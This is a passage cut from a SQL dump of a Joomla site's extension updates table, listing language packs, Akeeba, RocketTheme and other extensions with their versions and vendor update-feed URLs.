Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24856,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24857,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24858,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24859,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24860,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24861,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24862,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24863,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24864,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24865,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24866,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24867,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24868,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24869,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24870,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24871,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24872,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24873,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24874,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24875,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24877,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24878,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24879,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24880,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24881,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24882,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24883,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24884,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24885,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24886,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24887,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24888,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24889,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24890,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24891,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24892,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24893,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24894,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24895,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24896,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24897,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24898,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24899,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24900,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24901,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24902,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24903,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24904,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24905,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24906,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24907,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24908,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24909,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24910,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24911,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24912,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24913,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24914,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24915,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24916,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24917,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24918,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24919,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24920,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24921,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24922,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24923,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24924,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24925,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24926,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24927,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24928,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24929,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24930,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24931,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24932,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24933,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(24934,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(24935,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(24936,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(24937,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(24938,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(24939,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(24940,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(24941,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(24942,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(24943,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(24944,57,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(24945,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(24946,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(24947,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(24948,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(24949,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(24950,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(24951,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(24952,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(24953,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24954,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(24955,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(24956,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(24957,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(24958,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(24959,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(24960,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(24961,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(24962,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(24963,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(24964,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(24965,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(24966,57,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(24967,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(24968,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(24969,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(24970,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(24971,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(24972,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(24973,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(24974,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(24975,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(24976,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(24977,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(24978,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(24979,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(24980,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(24981,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(24982,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(24983,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(24984,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(24985,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(24986,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(24987,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(24988,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(24989,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(24990,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(24991,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24992,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(24993,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(24994,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(24995,129,0,'JCE 2.9.1','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.1','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-0-released',''),(24996,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(24997,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24998,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(24999,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25000,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25001,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25002,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25003,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25004,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25005,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25006,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25007,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(25008,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25009,1,0,'Joomla','','joomla','file','',0,'3.9.22','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(25010,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(25011,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(25012,3,0,'French','','pkg_fr-FR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(25013,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(25014,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(25015,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(25016,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(25017,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(25018,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(25019,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(25020,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(25021,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(25022,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25023,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(25024,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(25025,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(25026,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(25027,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(25028,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(25029,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(25030,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(25031,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(25032,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(25033,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(25034,3,0,'English US','','pkg_en-US','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(25035,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(25036,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(25037,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(25038,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(25039,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(25040,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(25041,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(25042,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(25043,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(25044,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(25045,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(25046,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(25047,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(25048,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(25049,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(25050,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(25051,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(25052,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(25053,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(25054,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(25055,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(25056,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(25057,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(25058,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(25059,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(25060,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(25061,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(25062,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(25063,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(25064,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(25065,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(25066,20,0,'RokCommon 